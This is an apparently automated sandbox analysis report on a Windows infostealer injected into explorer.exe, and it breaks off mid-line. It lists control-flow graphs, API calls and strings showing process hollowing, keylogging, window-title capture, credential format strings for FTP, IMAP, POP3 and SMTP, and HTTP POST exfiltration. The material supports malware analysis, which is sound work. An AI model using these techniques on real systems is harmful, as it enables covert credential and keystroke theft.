                                                                                            • Opcode ID: 0e96e4d402da3ada5d9879d61c48910d7cf2c2a69eba8b02fcc00329870ecf34
                                                                                            • Instruction ID: eaa003837dd7768fabd62f8c29da6c75dcf0a091d2299c5f2329d49b538fae9c
                                                                                            • Opcode Fuzzy Hash: 0e96e4d402da3ada5d9879d61c48910d7cf2c2a69eba8b02fcc00329870ecf34
                                                                                            • Instruction Fuzzy Hash: 5C31A530740215BBCF106FA0DC0AFAF3BA9AF19B41F044025FA16976D1CF759A918B90

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 236 191647-19165a 237 191748-19174f 236->237 238 191660-191662 236->238 238->237 239 191668-19166b 238->239 239->237 240 191671-19167d lstrlen 239->240 241 191683-19168a lstrlen 240->241 242 191747 240->242 241->242 243 191690-1916a8 getpeername 241->243 242->237 243->242 244 1916ae-1916ca inet_ntoa htons 243->244 244->242 245 1916cc-1916d4 244->245 246 191708 245->246 247 1916d6-1916d9 245->247 250 19170d-19173c call 192861 wsprintfA call 1924ae 246->250 248 1916db-1916de 247->248 249 1916f3-1916f8 247->249 251 191701-191706 248->251 252 1916e0-1916e3 248->252 249->250 250->242 260 19173e-191745 call 192843 250->260 251->250 254 1916fa-1916ff 252->254 255 1916e5-1916ea 252->255 254->250 255->249 257 1916ec-1916f1 255->257 257->242 257->249 260->242
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                            • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                            • API String ID: 3379139566-1703351401
                                                                                            • Opcode ID: 4639d6762da9eb29161be10fb4f654ae7fadb1c67a94c804d8964cfc41c41c64
                                                                                            • Instruction ID: 3f197a3d48c1934a6146f5dbbd280962da1b805ed4a2ddaa55aad4c48cc2b5b9
                                                                                            • Opcode Fuzzy Hash: 4639d6762da9eb29161be10fb4f654ae7fadb1c67a94c804d8964cfc41c41c64
                                                                                            • Instruction Fuzzy Hash: CD21B836E0030B77DF195FFD8D885BE7AAEAB45741B084076E915E3251DB34CE819B50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 268 191752-191774 GetModuleHandleA GetProcAddress 269 1917c1-1917c6 268->269 270 191776-1917c0 RtlZeroMemory * 4 268->270 270->269
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00191539,?,?,?,0019144B,?), ref: 00191763
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0019176A
                                                                                            • RtlZeroMemory.NTDLL(00194228,00000104), ref: 00191788
                                                                                            • RtlZeroMemory.NTDLL(00194118,00000104), ref: 00191790
                                                                                            • RtlZeroMemory.NTDLL(00194330,00000104), ref: 00191798
                                                                                            • RtlZeroMemory.NTDLL(00194000,00000104), ref: 001917A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MemoryZero$AddressHandleModuleProc
                                                                                            • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                            • API String ID: 1490332519-278825019
                                                                                            • Opcode ID: d3fb27d6fa7b5c45b15c408c7c1136b55e8ca6696edb95804e80db8f6988478a
                                                                                            • Instruction ID: 8509b05c3a538693cc1e048b94d6fbc728db2e3378f6d628bf84291dccbb7c35
                                                                                            • Opcode Fuzzy Hash: d3fb27d6fa7b5c45b15c408c7c1136b55e8ca6696edb95804e80db8f6988478a
                                                                                            • Instruction Fuzzy Hash: 71F03772B8033C37CD2023EA7C0AD5BBE5CDA55FEA3470162B614A3281DB967E4246F5

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 001924E7
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 001924EF
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001924FF
                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 0019250D
                                                                                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0019252C
                                                                                            • SuspendThread.KERNEL32(00000000), ref: 0019253C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0019254B
                                                                                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 0019255B
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00192566
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 1467098526-0
                                                                                            • Opcode ID: 53dc8c573811bb5414337dd4e9ea2e778125666fd558f106284fb6bbcce1ef2f
                                                                                            • Instruction ID: c95944fbbb0772eeeb214c39e61bd8258c27f5404089ae2e97cda560528e3873
                                                                                            • Opcode Fuzzy Hash: 53dc8c573811bb5414337dd4e9ea2e778125666fd558f106284fb6bbcce1ef2f
                                                                                            • Instruction Fuzzy Hash: 081161B1504301EFEB119F60AC4CBAFBBB8FF85B01F09051AF652D2550D7318A899BA3

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 282 191f4a-191fa5 call 1922b8 call 192861 call 1927e2 call 192374 291 191fc0-191fcc 282->291 292 191fa7-191fbe 282->292 295 191fd0-191fd2 291->295 292->295 296 191fd8-19200f RtlZeroMemory 295->296 297 1922a6-1922b5 call 192843 295->297 301 19229e-1922a5 296->301 302 192015-192030 296->302 301->297 303 192062-192074 302->303 304 192032-192043 call 1922e5 302->304 309 192078-19207a 303->309 310 192045-192054 304->310 311 192056 304->311 312 19228b-192291 309->312 313 192080-1920dc call 192731 309->313 314 192058-192060 310->314 311->314 317 19229a 312->317 318 192293-192295 call 192843 312->318 322 1920e2-1920e7 313->322 323 192284 313->323 314->309 317->301 318->317 324 1920e9-1920fa 322->324 325 192101-19212f call 192861 wsprintfW 322->325 323->312 324->325 328 192148-19215f 325->328 329 192131-192133 325->329 335 19219e-1921b8 328->335 336 192161-192197 call 192861 wsprintfW 328->336 330 192134-192137 329->330 332 192139-19213e 330->332 333 192142-192144 330->333 332->330 334 192140 332->334 333->328 334->328 340 1921be-1921d1 335->340 341 192261-192277 call 192843 335->341 336->335 340->341 345 1921d7-1921ed call 192861 340->345 349 192279-19227b call 192843 341->349 350 192280 341->350 351 1921ef-1921fa 345->351 349->350 350->323 353 1921fc-192209 call 192826 351->353 354 19220e-192225 351->354 353->354 358 192229-192236 354->358 359 192227 354->359 358->351 360 192238-19223c 358->360 359->358 361 19223e 360->361 362 192256-19225d call 192843 360->362 364 19223e call 192815 361->364 362->341 366 192243-192250 RtlMoveMemory 364->366 366->362
                                                                                            APIs
                                                                                              • Part of subcall function 00192861: GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
                                                                                              • Part of subcall function 00192861: RtlAllocateHeap.NTDLL(00000000), ref: 0019286B
                                                                                              • Part of subcall function 001927E2: lstrlen.KERNEL32(001940DA,?,00000000,00000000,00191F86,75918A60,001940DA,00000000), ref: 001927EA
                                                                                              • Part of subcall function 001927E2: MultiByteToWideChar.KERNEL32(00000000,00000000,001940DA,00000001,00000000,00000000), ref: 001927FC
                                                                                              • Part of subcall function 00192374: RtlZeroMemory.NTDLL(?,00000018), ref: 00192386
                                                                                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00191FE2
                                                                                            • wsprintfW.USER32 ref: 0019211B
                                                                                            • wsprintfW.USER32 ref: 00192186
                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00192250
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                            • API String ID: 4204651544-1701262698
                                                                                            • Opcode ID: a28ca4de7b51a829e2b9df2b69b2007ba488650ef00ea6fa732f15fd7409ddf1
                                                                                            • Instruction ID: 0efe6438fe9d8dac25567a101f4c83f60b08af148659c8a74cbd0ec27ae63ed2
                                                                                            • Opcode Fuzzy Hash: a28ca4de7b51a829e2b9df2b69b2007ba488650ef00ea6fa732f15fd7409ddf1
                                                                                            • Instruction Fuzzy Hash: 3FA15C71608305AFDB209F68D885A2FBBE8FB98740F14492DF995D3261DB70DE44CB62

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 367 1925ad-1925c9 OpenProcess 368 1925cb-1925da IsWow64Process 367->368 369 192600-192607 367->369 370 1925dc-1925ec IsWow64Process 368->370 371 1925f7 368->371 372 1925f9-1925fa CloseHandle 370->372 373 1925ee-1925f5 370->373 371->372 372->369 373->372
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,7591E800,?,?,microsoftedgecp.exe,00191287), ref: 001925BF
                                                                                            • IsWow64Process.KERNEL32(000000FF,?), ref: 001925D1
                                                                                            • IsWow64Process.KERNEL32(00000000,?), ref: 001925E4
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 001925FA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$Wow64$CloseHandleOpen
                                                                                            • String ID: microsoftedgecp.exe
                                                                                            • API String ID: 331459951-1475183003
                                                                                            • Opcode ID: 46595439f91970b4cd8100fdcef5c3507c8c0fe17e1297d4a8351c4df5e33981
                                                                                            • Instruction ID: 33981f2daf7a06d9867cac6980d3c26af43802a6108f0f4ebea86a7e4ad5295f
                                                                                            • Opcode Fuzzy Hash: 46595439f91970b4cd8100fdcef5c3507c8c0fe17e1297d4a8351c4df5e33981
                                                                                            • Instruction Fuzzy Hash: 8BF09071942218FFAB10CF919D89DEE776CEB01251B18026AF91492540D7314F44E6A0

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.7%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:9
                                                                                            Total number of Limit Nodes:2
                                                                                            execution_graph 769 8c9fab 770 8c9fd8 769->770 771 8ca1f3 769->771 774 8ca048 770->774 778 8ca04d 774->778 775 8ca135 LoadLibraryA 775->778 776 8ca190 VirtualProtect VirtualProtect 777 8ca1e8 776->777 777->777 778->775 778->776 779 8c9ff8 778->779

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available
                                                                                            callgraph 0 Function_008CB00C 1 Function_008C188C 29 Function_008C1838 1->29 2 Function_008C3088 15 Function_008C2E98 2->15 56 Function_008C1B70 2->56 3 Function_008C2E08 16 Function_008C2418 3->16 42 Function_008C1D50 3->42 45 Function_008C18E8 3->45 47 Function_008C1860 3->47 4 Function_008C2508 33 Function_008C25C4 4->33 43 Function_008C18D0 4->43 46 Function_008C24E0 4->46 5 Function_008C1C08 6 Function_008C1A88 7 Function_008C1508 8 Function_008CA00A 9 Function_008C4004 10 Function_008C1A04 11 Function_008C1405 12 Function_008C1000 13 Function_008C2E80 14 Function_008C141D 15->3 15->10 27 Function_008C2CB8 15->27 40 Function_008C1DD4 15->40 54 Function_008C2BF4 15->54 58 Function_008C2B70 15->58 16->29 41 Function_008C2054 16->41 16->47 17 Function_008C4019 18 Function_008C2010 18->10 19 Function_008C1C28 20 Function_008C9FAB 32 Function_008CA048 20->32 21 Function_008C45A7 22 Function_008C3020 22->15 22->56 23 Function_008C1D20 24 Function_008C2620 25 Function_008C3220 25->5 25->19 28 Function_008C1938 25->28 25->29 30 Function_008C1BB0 25->30 49 Function_008C2860 25->49 25->56 26 Function_008C1822 27->23 27->29 27->47 31 Function_008C14B2 32->8 50 Function_008C25FC 33->50 34 Function_008C1F40 34->29 51 Function_008C18F8 34->51 35 Function_008C4A41 36 Function_008C355C 36->25 36->29 36->36 36->56 59 Function_008C30F0 36->59 37 Function_008C1C58 38 Function_008C1254 39 Function_008C14D4 40->29 41->1 41->18 41->28 41->29 41->34 41->43 41->47 41->51 57 Function_008C1E70 41->57 42->29 44 Function_008C156C 47->56 48 Function_008C1560 49->24 53 Function_008C2774 49->53 49->56 52 Function_008C14F9 55 Function_008C1576 58->10 58->29 59->4 59->6 59->29 59->37 59->47

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 119 8c355c-8c356c call 8c1b70 122 8c35fc-8c3601 119->122 123 8c3572-8c35a5 call 8c1838 119->123 127 8c35a7 call 8c1838 123->127 128 8c35d1-8c35f6 NtUnmapViewOfSection 123->128 130 8c35ac-8c35c5 127->130 132 8c3608-8c3617 call 8c3220 128->132 133 8c35f8-8c35fa 128->133 130->128 139 8c3619-8c361c call 8c355c 132->139 140 8c3621-8c362a 132->140 133->122 134 8c3602-8c3607 call 8c30f0 133->134 134->132 139->140
                                                                                            APIs
                                                                                            • NtUnmapViewOfSection.NTDLL ref: 008C35D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 008C1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_16_2_8c1000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: SectionUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 498011366-0
                                                                                            • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                            • Instruction ID: 1cc43d3dd04253da903f19f8390d63c83df3090efa2a4ca2da8b42232e047299
                                                                                            • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                            • Instruction Fuzzy Hash: CD11C430615E095FEF58BBBC989DB7937B0FB19302F54413EA419C76A1DA39CA41C741

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 8c3220-8c325b call 8c1838 3 8c3261-8c3273 CreateToolhelp32Snapshot 0->3 4 8c3549-8c3554 SleepEx 3->4 5 8c3279-8c328f Process32First 3->5 4->3 6 8c3538-8c353a 5->6 7 8c3294-8c32ac 6->7 8 8c3540-8c3543 CloseHandle 6->8 10 8c348c-8c3495 call 8c1bb0 7->10 11 8c32b2-8c32c6 7->11 8->4 15 8c352a-8c3532 Process32Next 10->15 16 8c349b-8c34a4 call 8c1c08 10->16 11->10 17 8c32cc-8c32e0 11->17 15->6 16->15 22 8c34aa-8c34b1 call 8c1c28 16->22 17->10 21 8c32e6-8c32fa 17->21 21->10 26 8c3300-8c3314 21->26 22->15 27 8c34b3-8c34c1 call 8c1b70 22->27 26->10 32 8c331a-8c332e 26->32 27->15 31 8c34c3-8c3525 call 8c1938 call 8c2860 call 8c1938 27->31 31->15 32->10 36 8c3334-8c3348 32->36 36->10 41 8c334e-8c3362 36->41 41->10 44 8c3368-8c337c 41->44 44->10 46 8c3382-8c3396 44->46 46->10 48 8c339c-8c33b0 46->48 48->10 50 8c33b6-8c33ca 48->50 50->10 52 8c33d0-8c33e4 50->52 52->10 54 8c33ea-8c33fe 52->54 54->10 56 8c3404-8c3418 54->56 56->10 58 8c341a-8c342e 56->58 58->10 60 8c3430-8c3444 58->60 60->10 62 8c3446-8c345a 60->62 62->10 64 8c345c-8c3470 62->64 64->10 66 8c3472-8c3486 64->66 66->10 66->15
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 008C1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_16_2_8c1000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 2482764027-0
                                                                                            • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                            • Instruction ID: 65544898f8ed0d157cf7cca2b6e2f9285203968ff8bd553a1c1888de14ff2e40
                                                                                            • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                            • Instruction Fuzzy Hash: 958113312187088FEB1AEF54E898FE6B7B1FB61741F54861EA442C7160EF78DA05CB81

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 68 8ca048-8ca04b 69 8ca055-8ca059 68->69 70 8ca05b-8ca063 69->70 71 8ca065 69->71 70->71 72 8ca04d-8ca053 71->72 73 8ca067 71->73 72->69 74 8ca06a-8ca071 73->74 76 8ca07d 74->76 77 8ca073-8ca07b 74->77 76->74 78 8ca07f-8ca082 76->78 77->76 79 8ca084-8ca092 78->79 80 8ca097-8ca0a4 78->80 81 8ca0ce-8ca0e9 79->81 82 8ca094-8ca095 79->82 94 8ca0be-8ca0cc call 8ca00a 80->94 95 8ca0a6-8ca0a8 80->95 83 8ca11a-8ca11d 81->83 82->80 85 8ca11f-8ca120 83->85 86 8ca122-8ca129 83->86 87 8ca101-8ca105 85->87 88 8ca12f-8ca133 86->88 92 8ca0eb-8ca0ee 87->92 93 8ca107-8ca10a 87->93 90 8ca135-8ca14e LoadLibraryA 88->90 91 8ca190-8ca1e4 VirtualProtect * 2 88->91 100 8ca14f-8ca156 90->100 98 8ca1e8-8ca1ed 91->98 92->86 101 8ca0f0 92->101 93->86 96 8ca10c-8ca110 93->96 94->69 97 8ca0ab-8ca0b2 95->97 102 8ca0f1-8ca0f5 96->102 103 8ca112-8ca119 96->103 112 8ca0bc 97->112 113 8ca0b4-8ca0ba 97->113 98->98 104 8ca1ef-8ca1fe 98->104 100->88 106 8ca158 100->106 101->102 102->87 111 8ca0f7-8ca0f9 102->111 103->83 109 8ca15a-8ca162 106->109 110 8ca164-8ca16c 106->110 114 8ca16e-8ca17a 109->114 110->114 111->87 115 8ca0fb-8ca0ff 111->115 112->94 112->97 113->112 117 8ca17c-8ca183 114->117 118 8ca185-8ca18f 114->118 115->87 115->93 117->100
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE ref: 008CA147
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 008CA1BB
                                                                                            • VirtualProtect.KERNELBASE ref: 008CA1D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000010.00000002.4486772603.00000000008C7000.00000040.80000000.00040000.00000000.sdmp, Offset: 008C7000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_16_2_8c7000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual$LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 895956442-0
                                                                                            • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                            • Instruction ID: f95251fe0f7530c0cfa43dd802f5d84949b57f118a7a355aed3a0e4a696786f0
                                                                                            • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                            • Instruction Fuzzy Hash: 33514731258D1D4ACB2CAA789CC4BB5B7E1F75532DF18062FD48AC3285E579D8468383

                                                                                            Execution Graph

                                                                                            Execution Coverage:9.6%
                                                                                            Dynamic/Decrypted Code Coverage:97.5%
                                                                                            Signature Coverage:17.7%
                                                                                            Total number of Nodes:322
                                                                                            Total number of Limit Nodes:4
                                                                                            execution_graph 1019 2fe182d 1020 2fe1838 RtlEnterCriticalSection lstrlenW 1019->1020 1021 2fe18a8 RtlLeaveCriticalSection Sleep 1020->1021 1023 2fe1854 1020->1023 1021->1020 1023->1021 1027 2fe29eb VirtualQuery GetProcessHeap HeapFree 1023->1027 1028 2fe25a4 1023->1028 1034 2fe200d 1023->1034 1045 2fe29ae VirtualFree 1023->1045 1046 2fe2a09 GetProcessHeap RtlAllocateHeap 1023->1046 1027->1023 1029 2fe25e8 1028->1029 1030 2fe25b9 CryptBinaryToStringA 1028->1030 1029->1023 1030->1029 1031 2fe25cc 1030->1031 1047 2fe2a09 GetProcessHeap RtlAllocateHeap 1031->1047 1033 2fe25d7 CryptBinaryToStringA 1033->1029 1035 2fe2023 lstrlen 1034->1035 1036 2fe2030 1034->1036 1035->1036 1048 2fe2a09 GetProcessHeap RtlAllocateHeap 1036->1048 1038 2fe2038 lstrcat 1039 2fe206d lstrcat 1038->1039 1040 2fe2074 1038->1040 1039->1040 1049 2fe20a1 1040->1049 1043 2fe29eb 3 API calls 1044 2fe2097 1043->1044 1044->1023 1045->1023 1046->1023 1047->1033 1048->1038 1083 2fe240f 1049->1083 1053 2fe20ce 1088 2fe298a lstrlen MultiByteToWideChar 1053->1088 1055 2fe20dd 1089 2fe24cc RtlZeroMemory 1055->1089 1058 2fe212f RtlZeroMemory 1060 2fe2164 1058->1060 1059 2fe29eb 3 API calls 1061 2fe2084 1059->1061 1064 2fe23f1 1060->1064 1066 2fe2192 1060->1066 1091 2fe243d 1060->1091 1061->1043 1063 2fe23d7 1063->1064 1065 2fe29eb 3 API calls 1063->1065 1064->1059 1065->1064 1066->1063 1100 2fe2a09 GetProcessHeap RtlAllocateHeap 1066->1100 1068 2fe2262 wsprintfW 1069 2fe2288 1068->1069 1073 2fe22f5 1069->1073 1101 2fe2a09 GetProcessHeap RtlAllocateHeap 1069->1101 1071 2fe22c2 wsprintfW 1071->1073 1072 2fe23b4 1074 2fe29eb 3 API calls 1072->1074 1073->1072 1102 2fe2a09 GetProcessHeap RtlAllocateHeap 1073->1102 1076 2fe23c8 1074->1076 1076->1063 1077 2fe29eb 3 API calls 1076->1077 1077->1063 1078 2fe23ad 1081 2fe29eb 3 API calls 1078->1081 1079 2fe2340 1079->1078 1103 2fe29bd VirtualAlloc 1079->1103 1081->1072 1082 2fe239a RtlMoveMemory 1082->1078 1084 2fe20c0 1083->1084 1085 2fe2419 1083->1085 1087 2fe2a09 GetProcessHeap RtlAllocateHeap 1084->1087 1086 2fe2841 2 API calls 1085->1086 1086->1084 1087->1053 1088->1055 1090 2fe20ed 1089->1090 1090->1058 1090->1064 1093 2fe244a 1091->1093 1095 2fe24ab 1091->1095 1092 2fe244e DnsQuery_W 1092->1093 1093->1092 1094 2fe248d DnsFree inet_ntoa 1093->1094 1093->1095 1094->1093 1096 2fe24ad 1094->1096 1095->1066 1104 2fe2a09 GetProcessHeap RtlAllocateHeap 1096->1104 1098 2fe24b7 1105 2fe298a lstrlen MultiByteToWideChar 1098->1105 1100->1068 1101->1071 1102->1079 1103->1082 1104->1098 1105->1095 1106 2fe162b 1107 2fe163c 1106->1107 1112 2fe16aa 1106->1112 1108 2fe164b GetKeyboardState 1107->1108 1107->1112 1109 2fe165c ToUnicode 1108->1109 1108->1112 1110 2fe1684 1109->1110 1110->1112 1113 2fe16b9 RtlEnterCriticalSection 1110->1113 1114 2fe17ce RtlLeaveCriticalSection 1113->1114 1115 2fe16d2 lstrlenW 1113->1115 1114->1112 1116 2fe17bd 1115->1116 1117 2fe16ed lstrlenW 1115->1117 1116->1114 1120 2fe1702 1117->1120 1118 2fe174e GetForegroundWindow 1118->1116 1121 2fe175a GetWindowTextW 1118->1121 1119 2fe1723 1119->1116 1132 2fe17dc 1119->1132 1120->1118 1120->1119 1123 2fe177a lstrcmpW 1121->1123 1124 2fe1771 GetClassNameW 1121->1124 1126 2fe17bf lstrcatW 1123->1126 1127 2fe178b lstrcpyW 1123->1127 1124->1123 1125 2fe172f wsprintfW 1128 2fe17b6 1125->1128 1126->1116 1129 2fe17dc 4 API calls 1127->1129 1131 2fe29eb 3 API calls 1128->1131 1130 2fe1798 wsprintfW 1129->1130 1130->1128 1131->1116 1135 2fe2a09 GetProcessHeap RtlAllocateHeap 1132->1135 1134 2fe17ed GetLocalTime wsprintfW 1134->1125 1135->1134 771 2fe9ae0 772 2fe9ca4 771->772 773 2fe9aeb 771->773 772->772 774 2fe9bfa LoadLibraryA 773->774 777 2fe9c3f VirtualProtect VirtualProtect 773->777 775 2fe9c11 774->775 775->773 778 2fe9c23 GetProcAddress 775->778 777->772 778->775 779 2fe9c39 778->779 780 2fe1000 781 2fe1007 780->781 782 2fe1010 780->782 784 2fe1016 781->784 825 2fe2724 VirtualQuery 784->825 787 2fe1098 787->782 789 2fe102c RtlMoveMemory 790 2fe104d 789->790 791 2fe1072 GetCurrentProcessId 789->791 853 2fe2a09 GetProcessHeap RtlAllocateHeap 790->853 795 2fe109f 791->795 796 2fe1093 791->796 793 2fe1053 RtlMoveMemory 793->791 828 2fe10a5 795->828 796->787 798 2fe1096 796->798 854 2fe13ae RtlZeroMemory VirtualQuery 798->854 799 2fe10a4 801 2fe2a09 GetProcessHeap RtlAllocateHeap 799->801 802 2fe10bf 801->802 803 2fe2a09 GetProcessHeap RtlAllocateHeap 802->803 804 2fe10cc wsprintfA 803->804 808 2fe10f3 804->808 805 2fe276d OpenFileMappingA MapViewOfFile 805->808 806 2fe129a Sleep 806->808 807 2fe2841 lstrlen lstrlen 807->808 808->805 808->806 808->807 809 2fe275a UnmapViewOfFile CloseHandle 808->809 824 2fe1148 808->824 809->806 810 2fe2a09 GetProcessHeap RtlAllocateHeap 811 2fe1150 RtlMoveMemory CreateToolhelp32Snapshot 810->811 812 2fe1171 Process32First 811->812 811->824 814 2fe127e CloseHandle 812->814 815 2fe118d 812->815 813 2fe29eb VirtualQuery GetProcessHeap HeapFree 813->824 814->824 816 2fe1190 CharLowerA 815->816 817 2fe11ab lstrcmpiA 816->817 818 2fe1266 Process32Next 816->818 817->818 817->824 818->816 818->824 819 2fe12ae 16 API calls 819->824 820 2fe26c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 820->824 821 2fe2724 VirtualQuery 821->824 822 2fe1208 lstrcmpiA 822->824 823 2fe18bf 30 API calls 823->824 824->808 824->810 824->813 824->814 824->818 824->819 824->820 824->821 824->822 824->823 826 2fe101e 825->826 826->787 827 2fe2a09 GetProcessHeap RtlAllocateHeap 826->827 827->789 883 2fe2a09 GetProcessHeap RtlAllocateHeap 828->883 830 2fe10bf 884 2fe2a09 GetProcessHeap RtlAllocateHeap 830->884 832 2fe10cc wsprintfA 836 2fe10f3 832->836 834 2fe129a Sleep 834->836 835 2fe2841 lstrlen lstrlen 835->836 836->834 836->835 840 2fe1148 836->840 885 2fe276d OpenFileMappingA 836->885 950 2fe275a UnmapViewOfFile CloseHandle 836->950 839 2fe1150 RtlMoveMemory CreateToolhelp32Snapshot 839->840 841 2fe1171 Process32First 839->841 840->836 843 2fe127e CloseHandle 840->843 847 2fe1266 Process32Next 840->847 850 2fe2724 VirtualQuery 840->850 851 2fe1208 lstrcmpiA 840->851 888 2fe2a09 GetProcessHeap RtlAllocateHeap 840->888 889 2fe12ae 840->889 908 2fe26c9 OpenProcess 840->908 914 2fe18bf 840->914 945 2fe29eb 840->945 841->843 844 2fe118d 841->844 843->840 845 2fe1190 CharLowerA 844->845 846 2fe11ab lstrcmpiA 845->846 845->847 846->840 846->847 847->840 847->845 850->840 851->840 853->793 855 2fe13e4 854->855 975 2fe2a09 GetProcessHeap RtlAllocateHeap 855->975 857 2fe1402 GetModuleFileNameA 976 2fe2a09 GetProcessHeap RtlAllocateHeap 857->976 859 2fe1418 GetCurrentProcessId wsprintfA 977 2fe2799 CryptAcquireContextA 859->977 862 2fe145f RtlInitializeCriticalSection 982 2fe2a09 GetProcessHeap RtlAllocateHeap 862->982 863 2fe151b 865 2fe29eb 3 API calls 863->865 866 2fe1522 865->866 868 2fe29eb 3 API calls 866->868 867 2fe147f Sleep 983 2fe25f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 867->983 870 2fe1529 RtlExitUserThread 868->870 881 2fe1533 870->881 871 2fe1496 GetModuleHandleA GetProcAddress 872 2fe14c6 GetModuleHandleA GetProcAddress 871->872 873 2fe14b5 871->873 875 2fe14ea GetModuleHandleA 872->875 876 2fe14d9 872->876 991 2fe1f3a 873->991 1001 2fe1e89 875->1001 877 2fe1f3a 3 API calls 876->877 877->875 880 